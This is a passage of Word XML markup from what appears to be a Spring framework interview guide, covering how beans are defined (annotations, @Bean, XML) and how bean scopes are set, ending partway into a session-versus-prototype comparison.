    </w:p>
    <w:p w14:paraId="72D7F157"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Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61529D4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a NotificationService bean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A98B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0AE041D3"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tificati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4A03BB"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E1319"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nding notifi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p>
    <w:p w14:paraId="41AF6A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E2A1E" w14:textId="3B1010F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55767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85" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF3690"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3D9CF260"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86" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25562A9D"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75AD849A"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 or default scope in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4F14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for the entire application context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69B312"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tateless, shared components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540797C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so handle carefully if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42575A48"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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A4FF2" w14:textId="036B83E4" w:rsidR="007F561C" w:rsidRPr="00CE4B95" w:rsidRDefault="007F561C" w:rsidP="007F561C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="_Toc197867659"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you define a bean in Spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p w14:paraId="4A619608" w14:textId="06980653" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="009E373C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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1. Using Annotations (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Component</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Service</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Repository</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Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC590D1" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is the most modern and commonly used way (especially in Spring Boot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFAB0F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256367F8"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85B1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ADAC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ing something..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D77C9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361CD" w14:textId="315DAD7A"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F52E72"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 xml:space="preserve">Spring will automatically detect and register this bean if </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enabled (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ComponentScan</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or part of a Spring Boot app).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E03A9AC"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CE4B95" w14:paraId="288699C8" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9118A7"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726BB188"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Use For</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="6D33D62B" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC64C5F"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Generic component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="35C82D44" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78AC0FA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Service layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="47C37950" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B7D4F76"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DAO/persistence layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="3C3D8FA7" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3111CF0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VC web controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20BCD7A1"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88" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A90CCA" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">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2. Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C57ED"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Useful when you need more control over bean creation (e.g., third-party classes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B34B1C"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00553E81"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4B795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7B957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4B22C72F"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029B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logic, if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088C606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FCFA58" w14:textId="28DDF4BE"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36B0765"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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0771A7"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3. XML Configuration (Traditional, less used now)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A26D74"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xmln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http://www.springframework.org/schema/beans"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DA4C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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB8260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971D4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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A0A2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954868" w14:textId="2E38C65F"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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573A3FD" w14:textId="61153BC2" w:rsidR="008E5E16" w:rsidRPr="00CE4B95"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This approach was popular before annotations became widely used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE415D"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CE4B95" w14:paraId="41E6DECA" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F1E7337"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3E36C412"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Example Syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="560CBE21"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Use When</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="4B63739D" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50FDCD5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Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BA5F6A"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r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Service</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FEB27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ost common, easy to use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="36BAE5C7" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41571D16"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Java Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4603A0A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Bean</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Configuration</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1437AB7F"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When you need to manually configure bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="32934DDB" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B0DD77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XML Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D0EBCD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lt;bean&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tag in XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="596FD6E1"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Legacy code or specific config setups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="581E9569"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90" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9183EA" w14:textId="4347DCAD" w:rsidR="00D40DC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00D40DC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="446" w:name="_Toc197867660"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to add scope in bean configuration?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p w14:paraId="039342FA" w14:textId="3C5EDC19" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="002D12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an </w:t>
      </w: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xml:space="preserve"> determines the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lifecycle and visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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copes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3322A691"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p w14:paraId="535CD840"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p w14:paraId="2BE0E558"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Web apps only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB2F7E"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Web apps only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9DC67"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Web apps only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B916FC"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91" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3AAE5"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Annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AFFC04"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With @Scope Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAFE88"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DC36AD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singleton", "request", etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE6A63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3F409"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ean logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E69D3D" w14:textId="0C74A1CC"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18CAF1"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use @Scope on @Service, @Repository, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E7677" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="0006418F">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using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (request, session, etc.), add @Scope with proxyMode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD535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B021DD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5B3EE17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5DA7AC"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d to a single HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22EC7A" w14:textId="5C699CCE"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0B2DB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92" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5451C"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Java Configuration (@Bean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA6C4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001A182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D30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EC376"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72FD7891"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01073F8D"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DB4D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p>
    <w:p w14:paraId="24AFE4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33FE8B" w14:textId="0E3F40CA"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8CE905E"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93" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57855770"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XML Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD8E36D" w14:textId="6309AD5F"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01A3A9D3"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94" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB6ABC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CE4B95" w14:paraId="1ABDD496" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40EA3231"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DF5D94" w:rsidRPr="00CE4B95" w14:paraId="5ABFC97D" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F912BF8"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pring container (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="5AF37961" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AA1A50B"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instance every time it's requested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="218ACEAD" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49845C20"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request (web apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="4300B65C" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65277F0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session (web apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="4B89C4FE" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D60BABF"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ervletContext (web apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F57184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95" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F91682" w14:textId="2604CF2E" w:rsidR="00EB2AAE" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB2AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="447" w:name="_Toc197867661"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between session and prototype scope?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:p w14:paraId="78B75682" w14:textId="5F8E2F82" w:rsidR="00D9644F" w:rsidRPr="0033120A" w:rsidRDefault="00D9644F" w:rsidP="00B27185">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033120A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="0033120A">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CE4B95" w14:paraId="3AC6E9D4" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
